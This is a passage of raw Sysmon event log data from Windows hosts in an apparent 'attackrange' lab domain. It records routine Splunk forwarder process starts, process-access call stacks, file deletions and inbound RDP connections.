Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000977925Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:24.423{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-49674-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x8000000000000000977924Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.280{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-89CF-6151-A679-00000000FD01}892C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977923Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.280{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977922Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.280{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977921Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.280{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977920Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.280{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977919Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.280{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977918Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.280{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977917Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.280{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977916Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.280{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977915Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.280{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977914Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.280{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-89CF-6151-A679-00000000FD01}892C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977913Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.264{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-89CF-6151-A679-00000000FD01}892C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977912Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.265{69CF5F33-89CF-6151-A679-00000000FD01}892C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000977911Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.030{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1E3A7FDED251AF7F2A7853EEF88613A8,SHA256=1A916ABACC3167E851FFD9F7B645CC2BC6619DB872B6F31E713EBCD4376DC915,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000977910Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:27.030{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C963A7A6E05EBF4C3E303EA82C849643,SHA256=637D26699A7EE20EBB00217ED3DA5E6C1F027C7B228326BDD69BE44A9FC25976,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049295Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:07:25.026{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-60609-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 10341000x8000000000000000977954Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.545{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-89D0-6151-A879-00000000FD01}108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977953Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.545{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977952Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.545{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977951Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.545{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977950Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.545{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977949Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.545{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977948Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.545{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977947Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.545{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977946Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.545{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977945Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.545{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977944Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.530{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-89D0-6151-A879-00000000FD01}108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977943Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:07:28.530{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-89D0-6151-A879-00000000FD01}108C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program 